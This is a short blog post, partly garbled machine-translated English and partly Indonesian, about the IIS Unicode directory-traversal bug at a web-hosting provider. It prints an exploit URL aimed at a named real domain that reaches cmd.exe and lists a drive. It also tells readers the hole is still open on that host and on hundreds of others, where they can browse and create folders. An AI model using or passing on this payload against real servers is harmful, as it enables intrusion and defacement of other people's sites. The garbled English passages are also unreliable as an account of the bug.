Unicode bug in the web-hosting occurs when a server changes or the holding of re-formatting the server that eliminates all the passwords they store, even without formal recognition will especially notice it.
Bug was fixed which is the old bug that is unicode found by Georgi Guninski about a year ago that remains a favorite bug to be used in deface web site.
The exploit code for unicode is as follows:
http://www.jasakom.com/_vti_bin/ ..% c0% af ../..% c0% af ../..% c0% af../winnt/system32/cmd.exe? / c + dir + d: \
Â
Walaupun secara default anda tidak bisa melakukan deface kedalam web site tapi bahaya yang ditimbulkan tentu saja tetap besar karena semua file bisa dilihat dan dipelajari sehingga bahayanya tetap sama besarnya. Diketahui pula bahwa selain dari unicode terdapat lagi beberapa bug yang cukup berbahaya dari web site hosting ini sehingga membahayakan pelanggannya yang terlanjur percaya atas promosinya melalui beberapa web terkenal.
Sampai berita ini diturunkan, hole pada web-hosting masih belum diperbaiki sehingga anda tetap bisa melihat folder, membuat folder, dll pada web site jasakom maupun ratusan web hosting dari pihak lain.
Â
[-S'to-]
Â
0 comments:
Post a Comment